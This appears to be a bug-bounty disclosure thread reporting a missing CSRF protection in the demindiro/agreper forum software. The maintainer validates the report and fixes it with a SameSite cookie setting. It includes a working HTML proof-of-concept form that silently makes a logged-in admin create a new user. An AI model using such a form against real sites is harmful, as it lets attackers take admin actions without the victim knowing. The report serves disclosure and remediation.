Anti-CSRF mechanism is not present in demindiro/agreper
Jan 24th 2023
The application is vulnerable to a CSRF attack.
Proof of Concept
- Login as admin.
- Open the following HTML file in the browser. This action is equivalent to clicking a link sent by an attacker.
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/admin/user/new/" method="POST"> <input type="hidden" name="name" value="csrf" /> <input type="hidden" name="password" value="password" /> <input type="submit" value="Submit request" /> </form> </body> </html>
- Click the button.
- A new user is created.
This vulnerability is capable of allowing an attacker to force a victim to perform admin actions such as:
- Creating a new user
- Changing user's role
We are processing your report and will contact the demindiro/agreper team within 24 hours. 2 months ago
David Hoppenbrouwers validated this vulnerability 2 months ago
Apparently Flask doesn't set SameSite by default.
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax' resolves this issue.
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Hoppenbrouwers marked this as fixed in 0.1.1b with commit 09f56b 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation